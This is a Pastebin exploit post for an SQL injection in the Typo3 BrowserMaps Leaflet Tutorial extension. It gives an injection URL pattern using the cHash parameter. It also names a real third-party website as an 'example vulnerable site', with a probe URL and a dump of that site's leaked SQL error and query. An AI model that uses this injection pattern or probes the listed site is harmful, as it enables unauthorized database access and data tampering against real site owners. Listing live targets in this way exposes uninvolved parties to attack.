API tools faq
paste
Advertisement
KingSkrupellos

Typo3 CMS BrowserMaps Leaflet Tutorial 8.0.39 SQL Injection

KingSkrupellos
Feb 18th, 2019
127
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.43 KB | None | 0 0
raw download clone embed print report
  1. ##################################################################################
  2.  
  3. # Exploit Title : Typo3 CMS BrowserMaps Leaflet Tutorial tx_browser_pi1 8.0.39 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/02/2019
  7. # Vendor Homepage : typo3-organiser.de ~ typo3.org
  8. # Software Download Links :
  9. extensions.typo3.org/extension/download/browser_tut_map_en/4.1.15/zip/
  10. extensions.typo3.org/extension/download/browser_tut_map_en/4.1.17/zip/
  11. extensions.typo3.org/extension/download/browser_tut_map_en/4.1.23/zip/
  12. extensions.typo3.org/extension/download/browser_tut_map_en/4.1.24/zip/
  13. extensions.typo3.org/extension/download/browser_tut_map_en/4.4.0/zip/
  14. extensions.typo3.org/extension/download/browser_tut_map_en/4.6.2/zip/
  15. extensions.typo3.org/extension/download/browser_tut_leaflet_en/7.0.10/zip/
  16. extensions.typo3.org/extension/download/browser_tut_leaflet_en/7.0.2/zip/
  17. extensions.typo3.org/extension/download/browser_tut_leaflet_en/7.0.1/zip/
  18. extensions.typo3.org/extension/download/browser_tut_leaflet_en/8.0.39/zip/
  19. # Software Information Links : extensions.typo3.org/extension/browser_tut_map_en/
  20. extensions.typo3.org/extension/browser_tut_leaflet_en/
  21. # Software Version : TYPO3 works with (4.5.0 - 6.2.99)
  22. 7.0.1 - 7.0.2 - 7.0.10 - 8.0.39 and all previous versions
  23. # Tested On : Windows and Linux
  24. # Category : WebApps
  25. # Exploit Risk : Medium
  26. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  27. Special Elements used in an SQL Command ('SQL Injection') ]
  28. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  29. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  30. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  31.  
  32. ##################################################################################
  33.  
  34. # Description about Software :
  35. ***************************
  36. Publish your data and points of interest (POI) with GoogleMaps and OpenStreetMap!
  37.  
  38. Use Leaflet with your own database. Use Leaflet ready-to-use with the Organiser -
  39.  
  40. TYPO3 for the lobbies and the organisers. Update the geocoding of any address.
  41.  
  42. Configure Leaflet with the Constant Editor. Leaflet is a responsive mobile-friendly interactive map.
  43.  
  44. ##################################################################################
  45.  
  46. # Impact :
  47. ***********
  48. Typo3 BrowserMaps Leaflet Tutorial tx_browser_pi1 8.0.39 [ and other versions ]
  49.  
  50. extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  51.  
  52. user-supplied data before using it in an SQL query.
  53.  
  54. Exploiting this issue could allow an attacker to compromise the application,
  55.  
  56. access or modify data, or exploit latent vulnerabilities in the underlying database.
  57.  
  58. A remote attacker can send a specially crafted request to the vulnerable application
  59.  
  60. and execute arbitrary SQL commands in application`s database.
  61.  
  62. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  63.  
  64. An attacker can exploit this issue using a browser.
  65.  
  66. ##################################################################################
  67.  
  68. # SQL Injection Exploit :
  69. **********************
  70.  
  71. /index.php?id=[ID-NUMBER]&tx_browser_pi1%5BshowUid%5D=46&L=[ID-NUMBER]&cHash=[SQL Injection]
  72.  
  73. ##################################################################################
  74.  
  75. # Example Vulnerable Sites :
  76. *************************
  77. [+] girloon.de/index.php?id=95&tx_browser_pi1%5BshowUid%5D=46&L=1&cHash=1%27
  78.  
  79. ##################################################################################
  80.  
  81. # Example SQL Database Error :
  82. ****************************
  83. caller
  84.  
  85. TYPO3\CMS\Core\Database\DatabaseConnection::sql_query
  86.  
  87. ERROR
  88.  
  89. You have an error in your SQL syntax; check the manual that
  90. corresponds to your MySQL server version for the right syntax to use near '-1' at line 66
  91.  
  92. lastBuiltQuery
  93.  
  94. SELECT DISTINCT tx_carpet_domain_model_produkt.uid
  95. AS 'tx_carpet_domain_model_produkt.uid' FROM tx_carpet_domain_model_produkt
  96. LEFT JOIN tx_carpet_produkt_muster_mm AS tx_carpet_domain_model_
  97. produkt_mm_tx_carpet_domain_model_muster
  98. ON tx_carpet_domain_model_produkt.uid = tx_carpet_domain_
  99. model_produkt_mm_tx_carpet_domain_model_muster.uid_local
  100.  
  101. ##################################################################################
  102.  
  103. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  104.  
  105. ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!